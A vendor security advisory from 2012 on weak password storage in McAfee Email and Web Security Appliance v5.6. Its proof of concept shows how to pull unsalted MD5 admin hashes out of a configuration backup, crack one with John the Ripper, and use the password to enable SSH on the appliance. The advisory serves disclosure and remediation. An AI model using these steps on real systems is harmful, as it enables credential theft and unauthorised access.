Summary
Name: McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
Release Date: 30 November 2012
Reference: NGS00157
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 25 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
weak storage of passwords meaning that password hashes can be recovered
from a system backup and easily cracked
The exploit would enable an attacker to:
– Having gained access to the UI, recover and crack administrator password
hashes
– Having cracked the SuperAdministrator password, this will enable an
attacker to enable SSH and login to the appliance operating system
Technical Details
I. VULNERABILITY
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
II. BACKGROUND
McAfee (Owned by Intel) is one of the worlds best known providers of IT
security products.
The McAfee Email and Web Security Appliance provides security for Email and
Web protocols, and acts as a Firewall and Gateway solution.
III. DESCRIPTION
McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
IV. PROOF OF CONCEPT
Password hashes can be recovered from a system backup and easily cracked
(these are not salted and are stored as simmple MD5 hashes, so a simple
google search may be enough to find the password)
System > Cluster Management > Backup and Restore Configuration > Backup
Configuration > Backup the product
Unpack the zip file
unzip config_20111106152627.zip
Grep for passwords in “/proto/wsadmin/users.xml”
grep password proto/wsadmin/users.xml
md5sum –>
role=”super” usekdc=”0″ kdc=”” log-session=”1″ sa_admin=”1″
password=”5a731a984ad01873cafab2ba10449b9a” vhost=””/>
If the password cannot be found by searching google (unlikely) then John
The Ripper can be used as follows:
john –format=raw-MD5 mcafee.txt
Loaded 1 password hash (Raw MD5 [raw-md5 64×1])
admin2 (?)
guesses: 1 time: 0:00:00:00 100.00% (2) (ETA: Mon Nov 7 13:10:15 2011)
c/s: 876800 trying: rabbit2 – altamira2
This password, is also the same as the password for the “support” user for
SSH logins.
To enable SSH:
System > Appliance Management > Remote Access > Enable the secure shell
(then save policy)
Fix Information
Password hashes should be stored in a secure format such as salted SHA1-512
Verification should be obtained before system backups can be taken
Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, McAfee Email Gateway 7.0 Patch 1
